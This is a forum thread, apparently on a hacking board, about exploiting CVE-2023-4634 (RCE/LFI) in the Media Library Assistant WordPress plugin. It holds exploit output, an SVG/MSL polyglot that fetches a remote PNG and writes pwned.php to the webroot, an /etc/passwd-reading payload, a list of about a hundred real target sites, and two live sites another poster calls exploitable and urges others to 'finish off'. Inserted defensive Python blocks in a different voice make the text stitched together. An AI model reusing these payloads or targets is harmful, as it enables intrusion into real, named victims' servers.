Wordpress Plugin Media-Library Plugin | RCE | CVE-2023-4634

Discussion in 'Sandbox' (Песочница) started by marmalade_knight, 16 Sep 2023.

  1. marmalade_knight

    marmalade_knight New Member

  2. b3

    b3 Banned

    That kindergarten stuff about WSO doesn't need to be added; just the information about the exploit is enough.
     
  3. x0xx

    x0xx Banned

    Had to fight with the installation: the code depends on version 3.9+, otherwise it crashes with an error from grequests.
    Besides that, pillow is missing. On deb:11 (python3.11*) I had to run it with this flag for the install to work:
    Code:
    python3 -m pip install -r requirements.txt --break-system-packages
    
    Can someone explain the drop part:
    Code:
    [-] Checking arguments
       [-] All arguments for exploiting target are set, beginning the first checks
       [-] The remote FTP polyglot SVG/MSL file is reachable
       [-] The remote FTP polyglot SVG/MSL file ending with [0] is reachable
       [-] A sample remote FTP exploiter VID test file is reachable
       [-] A sample Remote FTP exploiter VID test file ending with [0] is reachable
       [-] The remote Exploit PNG/PHP file is reachable
    [!] All arguments have been checked correctly, lauching exploitation
    [-] Lauching 100 Threads on long SVG
    [-] Waiting 5 second for the file to be created
    [-] Starting Bruteforcing with VID exploiters
    [-] Checking the drop of pwned.php
       [!] Not yet, try 1 on 9 ... checking again in 10 seconds
       [!] Not yet, try 2 on 9 ... checking again in 10 seconds
       [!] Not yet, try 3 on 9 ... checking again in 10 seconds
       [!] Not yet, try 4 on 9 ... checking again in 10 seconds
       [!] Not yet, try 5 on 9 ... checking again in 10 seconds
       [!] Not yet, try 6 on 9 ... checking again in 10 seconds
       [!] Not yet, try 7 on 9 ... checking again in 10 seconds
       [!] Not yet, try 8 on 9 ... checking again in 10 seconds
       [!] Not yet, try 9 on 9 ... checking again in 10 seconds
       [!] Exploit has not worked, try by increase concurrency value or use another method
    
    
    Not enough rights on the root? Do we go with the good old paths, --exploitname one/way/upload/pwned.php ?
    UPD: no luck


    Code:
    grep exploitname CVE-2023-4634.py
            '--exploitname',
        exploitname = args.exploitname
            if not svg_polyglot_name or not svg_exploiter_names or not remotehttp or not png_polyglot_name or not webserverpath or not exploitname:
                print(colored("\t\t[x] The --svg_polyglot_name, --svg_exploiter_names, --remotehttp, --png_polyglot_name, --webserverpath and --exploitname options are needed to create the SVG/MSL Polyglot file", "red"))
        </image>""" % { "remotehttp": remotehttp +"/"+png_polyglot_name , "webserverpath" : webserverpath+"/"+exploitname }
        elif target and remoteftp and remotehttp and svg_polyglot_name and svg_exploiter_names and png_polyglot_name and exploitname:
            print(colored("[-] Checking the drop of "+exploitname, "cyan"))
            target_virus = target+"/"+exploitname
    
    
    upd:
    unclear: the path is hardcoded in poly.svg:

    cat remote_ftp/poly.svg
    Code:
    <?xml version="1.0" encoding="UTF-8"?>
        <image>
        <read filename="http://123.123.123.123:80/virus.png" />
        <resize geometry="400x400" />
        <write filename="/var/www/html/pwned.php" />
        <get width="base-width" height="base-height" />
        <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
        <image xlink:href="http://192.192.192.23:1664/neverExist.svg" height="100" width="100"/>
        </svg>
    
    Brought up FTP manually with anonymous login open and uploaded the 2 SVGs (1.svg + 1.svg[0])
    Code:
    <svg width="500" height="500"
    xmlns:xlink="http://www.w3.org/1999/xlink">
    xmlns="http://www.w3.org/2000/svg">
    <image xlink:href= "text:/etc/passwd" width="500" height="500" />
    </svg>
    
    When opening:
    Code:
    http://site/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:2122/1.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600
    
    It returns an image with no content, i.e. just a white background, no matter how you change *height + width

    Code:
    --webserverpath WEBSERVERPATH
                            Path of the webserver on the victim server (could be found with the LFI and wp-config file) 
    example: /var/www/html
    https://github.com/Patrowl/CVE-2023-4634/issues/2
    

    and it may well not be found; needs testing on a local box. If anyone actually uses this or is going to test it, report back.
     
    #3 x0xx, 27 Sep 2023
    Last edited: 27 Sep 2023
  4. b3

    b3 Banned

    Tested a bit on a local box tonight, got strange results, will continue tomorrow. In a word: NOT CLEAR. There is a connection to the FTP, but GS complains in the logs. Either a specific SVG is needed or the right policy for imagemagick; haven't fully figured it out myself yet. The default Debian 12 config didn't break. On a couple of real targets the svg worked, but only as a drawing; reading text via text:/etc/passwd didn't work.
    If anyone wants to join our merry hacker get-togethers, write.
     
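    The policy question raised above can be checked offline. The following is an added example, not the forum's or the exploit's code: it parses an ImageMagick policy.xml and reports the effective rights for the coders this chain touches (MSL for the SVG/MSL polyglot, TEXT for text:/etc/passwd, FTP/HTTPS/URL for pulling the remote SVG and PNG). The embedded policy.xml is a constructed sample, not Debian's shipped file, and the list of "relevant" coders is the example's own assumption.

```python
"""Check an ImageMagick policy.xml for the coders the chain in this thread
depends on. Added example, not the forum's or the exploit's code."""
import fnmatch
import xml.etree.ElementTree as ET

# Coders the chain in this thread touches (assumption about which ones matter):
# MSL for the SVG/MSL polyglot, TEXT for text:/etc/passwd, FTP/HTTPS/URL for
# fetching the remote SVG and PNG, SVG for the outer image itself.
CHAIN_CODERS = ("MSL", "TEXT", "FTP", "HTTPS", "URL", "SVG")
REMOTE_CODERS = ("FTP", "HTTPS", "URL")
ALL_RIGHTS = frozenset({"read", "write", "execute"})

# Constructed sample policy.xml in the style of a hardened install; it is not
# copied from Debian or any other distribution's shipped file.
SAMPLE_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="PS"/>
  <policy domain="coder" rights="none" pattern="PDF"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
  <policy domain="coder" rights="none" pattern="TEXT"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="read" pattern="HTTPS"/>
  <policy domain="path" rights="none" pattern="@*"/>
</policymap>
"""


def coder_rights(policy_xml: str, coder: str) -> frozenset:
    """Effective rights for one coder under a policy.xml.

    ImageMagick checks every <policy domain="coder"> whose glob pattern matches
    the coder name and refuses a request if any matching entry lacks the
    requested right, so the effective set is the intersection of all matching
    entries; with no match at all the coder is unrestricted. ImageMagick's
    coder names are upper-case, so both sides are upper-cased before matching.
    """
    effective = set(ALL_RIGHTS)
    root = ET.fromstring(policy_xml)
    for pol in root.iter("policy"):
        if pol.get("domain") != "coder":
            continue
        if not fnmatch.fnmatchcase(coder.upper(), pol.get("pattern", "").upper()):
            continue
        rights = pol.get("rights", "none").lower()
        granted = set() if rights == "none" else {r.strip() for r in rights.split("|")}
        effective &= granted
    return frozenset(effective)


def chain_exposure(policy_xml: str) -> dict:
    """Map each chain coder to its effective rights set."""
    return {c: coder_rights(policy_xml, c) for c in CHAIN_CODERS}


def chain_summary(policy_xml: str) -> dict:
    """Three yes/no answers a tester wants before blaming the SVG:
    can a remote SVG be pulled in at all, can text:/etc/passwd be rendered,
    and can an MSL script run its <read>/<write> steps."""
    exp = chain_exposure(policy_xml)
    return {
        "remote_read_allowed": any("read" in exp[c] for c in REMOTE_CODERS),
        "text_read_allowed": "read" in exp["TEXT"],
        "msl_allowed": "read" in exp["MSL"],
    }


def summary_from_file(path: str) -> dict:
    """Same check against a real file, e.g. /etc/ImageMagick-6/policy.xml."""
    with open(path, encoding="utf-8") as fh:
        return chain_summary(fh.read())


if __name__ == "__main__":
    for coder, rights in chain_exposure(SAMPLE_POLICY).items():
        print(f"{coder:6} {'|'.join(sorted(rights)) or 'none'}")
    print(chain_summary(SAMPLE_POLICY))
```

    Note what the sample shows: a pattern only covers the coder names it globs, so `pattern="URL"` does not restrict the separately registered `FTP` coder, and an ftp:// fetch like the one in this thread is still permitted while http-style URL reads are not. Run `summary_from_file()` against the policy of the local box and the live target's IM version side by side before concluding the SVG itself is at fault.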
  5. x0xx

    x0xx Banned

    Drawing a file's contents over the image via mla_debug, aka the LFI.

    Code:
    ...you can try adding mla_debug=true ... this will display a lot of ugly debug information on the screen...
    
    As I understand it, the "ugly information" drawn over the image is, in our case, exactly the rendering of /etc/passwd.
    At first glance the example looks broken:
    Code:
    <svg width="500" height="500"
    xmlns:xlink="http://www.w3.org/1999/xlink">
    xmlns="http://www.w3.org/2000/svg">
    <image xlink:href= "text:/etc/passwd" width="500" height="500" />
    </svg>
    
    But it is precisely that error that makes it possible to get the data out via mla_debug=true; what dependencies have to be taken into account is still unclear to me.
    A very finicky bug.
    Feature: wp-content/plugins/media-library-assistant/readme.txt lets you find out the plugin version.
    So far I've tested the log output on:
    Code:
    = 3.06 =
    = 2.79 =
    = 3.04 =
    
     
    #5 x0xx, 29 Sep 2023
    Last edited: 29 Sep 2023
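    The readme.txt version check mentioned above, as an added example (not the exploit's or the forum's code): it pulls the `Stable tag` out of a WordPress-style readme.txt, falls back to the newest `= x.yy =` changelog header of the kind listed in the post, and compares the result against the fixed release. The embedded readme is a constructed excerpt; the cut-off of 3.10 comes from the upstream advisory for CVE-2023-4634 and is not stated anywhere in this thread.

```python
"""Version triage for Media Library Assistant from its public readme.txt.
Added example; not the exploit's or the forum's code."""
import re
import urllib.request
from typing import Optional

README_PATH = "/wp-content/plugins/media-library-assistant/readme.txt"

# Versions up to and including 3.09 are affected per the upstream advisory for
# CVE-2023-4634; this value is not stated in the thread itself.
FIXED_IN = "3.10"

# Constructed excerpt in the WordPress.org readme.txt format; only the fields
# this check reads are present and the changelog text is a placeholder.
SAMPLE_README = """=== Media Library Assistant ===
Contributors: dglingren
Requires at least: 3.5.0
Tested up to: 6.3
Stable tag: 3.06
License: GPLv2 or later

== Changelog ==

= 3.06 =
* Constructed changelog entry.

= 3.04 =
* Constructed changelog entry.
"""

_STABLE = re.compile(r"^Stable tag:\s*([0-9][\w.\-]*)", re.I | re.M)
_CHANGELOG_HDR = re.compile(r"^=\s*([0-9][\w.\-]*)\s*=\s*$", re.M)


def version_tuple(v: str) -> tuple:
    """'3.06' -> (3, 6); '3.10' -> (3, 10). Stops at the first non-numeric part
    so a string compare never says 3.9 > 3.10."""
    parts = []
    for p in v.split("."):
        m = re.match(r"\d+", p)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_before(version: str, fixed: str = FIXED_IN) -> bool:
    """True if `version` predates the fixed release."""
    return version_tuple(version) < version_tuple(fixed)


def stable_tag(readme: str) -> Optional[str]:
    """The 'Stable tag:' header, or None when absent or set to 'trunk'."""
    m = _STABLE.search(readme)
    return m.group(1) if m else None


def changelog_versions(readme: str) -> list:
    """All '= x.yy =' changelog headers, in file order."""
    return _CHANGELOG_HDR.findall(readme)


def triage(readme: str, fixed: str = FIXED_IN) -> dict:
    """Prefer the stable tag; otherwise take the newest changelog header,
    which is how the post above reads versions off readme.txt."""
    tag = stable_tag(readme)
    changelog = changelog_versions(readme)
    version = tag or (max(changelog, key=version_tuple) if changelog else None)
    return {
        "version": version,
        "source": "stable_tag" if tag else "changelog",
        "vulnerable_range": None if version is None else is_before(version, fixed),
    }


def fetch_readme(base_url: str, timeout: float = 10.0) -> str:
    """Fetch readme.txt from a site you are authorised to test. Network call;
    not exercised by the offline sample below."""
    with urllib.request.urlopen(base_url.rstrip("/") + README_PATH, timeout=timeout) as r:
        return r.read().decode("utf-8", "replace")


if __name__ == "__main__":
    print(triage(SAMPLE_README))
```

    `vulnerable_range` only says the version is in the affected range; as the thread shows, whether the LFI or the MSL write actually fires still depends on the target's ImageMagick/Ghostscript setup, so treat it as a triage filter, not a confirmation.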
  6. b3

    b3 Banned

    Well, we've got file reading figured out; it works. A couple of caveats, but it works. RCE, on the other hand, we haven't seen on any target yet.
    Right now it isn't even clear why the "reader" works on some targets and not on others. We set up a local box with all the conditions seemingly met, but the "reader" didn't work there. Possibly the IM or GS version plays a role.
     
    #6 b3, 30 Sep 2023
    Last edited: 30 Sep 2023
  7. edos

    edos Member

    A hundred hosts with various versions; many have already updated since my last scan. I got nothing out of this CVE myself.

    Code:
    http://theblemish.com/wp-content/plugins/media-library-assistant/readme.txt
    http://funnymedianews.com/wp-content/plugins/media-library-assistant/readme.txt
    http://bonehealthandosteoporosis.org/wp-content/plugins/media-library-assistant/readme.txt
    http://tabacshop.ch/wp-content/plugins/media-library-assistant/readme.txt
    http://nmuofficial.com/wp-content/plugins/media-library-assistant/readme.txt
    http://sirabee.com/wp-content/plugins/media-library-assistant/readme.txt
    http://hometownhealthcenter.org/wp-content/plugins/media-library-assistant/readme.txt
    http://aqleeat.com/wp-content/plugins/media-library-assistant/readme.txt
    http://talkingpointsmemo.com/wp-content/plugins/media-library-assistant/readme.txt
    http://weltwoche.de/wp-content/plugins/media-library-assistant/readme.txt
    http://perishablenews.com/wp-content/plugins/media-library-assistant/readme.txt
    http://cbm.ch/wp-content/plugins/media-library-assistant/readme.txt
    http://desafio21diassemcarne.com.br/wp-content/plugins/media-library-assistant/readme.txt
    http://themagicforless.com/wp-content/plugins/media-library-assistant/readme.txt
    http://catholicnews.com/wp-content/plugins/media-library-assistant/readme.txt
    http://elberadweg.de/wp-content/plugins/media-library-assistant/readme.txt
    http://aryan-solutions.com/wp-content/plugins/media-library-assistant/readme.txt
    http://lightnovelstranslations.com/wp-content/plugins/media-library-assistant/readme.txt
    http://ame-name.com/wp-content/plugins/media-library-assistant/readme.txt
    http://arpc.gov.au/wp-content/plugins/media-library-assistant/readme.txt
    http://brainright.com/wp-content/plugins/media-library-assistant/readme.txt
    http://figment.live/wp-content/plugins/media-library-assistant/readme.txt
    http://fpta.pt/wp-content/plugins/media-library-assistant/readme.txt
    http://tm-consulting.ru/wp-content/plugins/media-library-assistant/readme.txt
    http://maxlucado.com/wp-content/plugins/media-library-assistant/readme.txt
    http://plumamazing.com/wp-content/plugins/media-library-assistant/readme.txt
    http://trolleymuseum.org/wp-content/plugins/media-library-assistant/readme.txt
    http://grapplersguide.com/wp-content/plugins/media-library-assistant/readme.txt
    http://inventorysource.com/wp-content/plugins/media-library-assistant/readme.txt
    http://disneynews.us/wp-content/plugins/media-library-assistant/readme.txt
    http://militaryscalemodelling.com/wp-content/plugins/media-library-assistant/readme.txt
    http://infonomics-society.org/wp-content/plugins/media-library-assistant/readme.txt
    http://croci.net/wp-content/plugins/media-library-assistant/readme.txt
    http://unexmin.eu/wp-content/plugins/media-library-assistant/readme.txt
    http://historicjamestowne.org/wp-content/plugins/media-library-assistant/readme.txt
    http://sis.us/wp-content/plugins/media-library-assistant/readme.txt
    http://shambhala.org/wp-content/plugins/media-library-assistant/readme.txt
    http://localpedia.de/wp-content/plugins/media-library-assistant/readme.txt
    http://phantis.com/wp-content/plugins/media-library-assistant/readme.txt
    http://vintagelittlelady.com/wp-content/plugins/media-library-assistant/readme.txt
    http://uka.org.uk/wp-content/plugins/media-library-assistant/readme.txt
    http://thfoods.com/wp-content/plugins/media-library-assistant/readme.txt
    http://flingtrainer.com/wp-content/plugins/media-library-assistant/readme.txt
    http://trulucks.com/wp-content/plugins/media-library-assistant/readme.txt
    http://cvsu.edu.ph/wp-content/plugins/media-library-assistant/readme.txt
    http://globalrallycross.com/wp-content/plugins/media-library-assistant/readme.txt
    http://polkadotwedding.com/wp-content/plugins/media-library-assistant/readme.txt
    http://yosmart.com/wp-content/plugins/media-library-assistant/readme.txt
    http://tretavazrast.com/wp-content/plugins/media-library-assistant/readme.txt
    http://alumni.ucd.ie/wp-content/plugins/media-library-assistant/readme.txt
    http://research.lifeway.com/wp-content/plugins/media-library-assistant/readme.txt
    http://ack.ug.edu.pl/wp-content/plugins/media-library-assistant/readme.txt
    http://library.mwit.ac.th/wp-content/plugins/media-library-assistant/readme.txt
    http://shop.dtwrestling.com/wp-content/plugins/media-library-assistant/readme.txt
    http://zip-tokens.com.customers.tigertech.net/wp-content/plugins/media-library-assistant/readme.txt
    http://elrecanv.vh122.hosterby.com/wp-content/plugins/media-library-assistant/readme.txt
    http://hotel.rosenthal.de/wp-content/plugins/media-library-assistant/readme.txt
    http://alumni.pensacolastate.edu/wp-content/plugins/media-library-assistant/readme.txt
    http://studio.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
    http://studio-rc.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
    http://studio-stage.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
    http://brandstore.wabco-auto.com/wp-content/plugins/media-library-assistant/readme.txt
    http://shop.transition-news.org/wp-content/plugins/media-library-assistant/readme.txt
    http://web.csg.org/wp-content/plugins/media-library-assistant/readme.txt
    http://shop.glciran.com/wp-content/plugins/media-library-assistant/readme.txt
    http://th.kumonglobal.com/wp-content/plugins/media-library-assistant/readme.txt
    http://hrc.sfasu.edu/wp-content/plugins/media-library-assistant/readme.txt
    http://m5.moonideas.com/wp-content/plugins/media-library-assistant/readme.txt
    http://shop.nwfa.org/wp-content/plugins/media-library-assistant/readme.txt
    http://elementor.inmak.net/wp-content/plugins/media-library-assistant/readme.txt
    http://is.fourfaith.com/wp-content/plugins/media-library-assistant/readme.txt
    http://buk.um.ac.id/wp-content/plugins/media-library-assistant/readme.txt
    http://library.addu.edu.ph/wp-content/plugins/media-library-assistant/readme.txt
    http://treasure.ready.jp/wp-content/plugins/media-library-assistant/readme.txt
    http://centralny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://bostoncig.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://newhampshire.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://capitalregionny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://vermont.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://missionlifelineia.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://connecticut.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://southernnewengland.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://newjersey.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://westernny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://cprblog.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://hudsonvalleyny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://rochester.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://massachusetts.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://longisland.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://heartofuticagrants.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://nyc.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://maine.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://midatlantic.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://applicants.mta.ac.il/wp-content/plugins/media-library-assistant/readme.txt
    http://33213.dcpserver.de/wp-content/plugins/media-library-assistant/readme.txt
    http://library.joshibi.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
    http://clubcurator.golftec.com/wp-content/plugins/media-library-assistant/readme.txt
    http://byrne.pinelandsalliance.org/wp-content/plugins/media-library-assistant/readme.txt
    http://teacherpress.ocps.net/wp-content/plugins/media-library-assistant/readme.txt
    http://hrlms.ipro.org/wp-content/plugins/media-library-assistant/readme.txt
    http://nyushi.otaru-uc.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
    http://netmedia.kanto-gakuin.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
    http://nasukashi.niye.go.jp/wp-content/plugins/media-library-assistant/readme.txt
     
  8. b3

    b3 Banned

    for RCE you need the path

    it works here, we checked quickly; finish it off)
    Code:
    midatlantic.heart.org
    clubcurator.golftec.com
     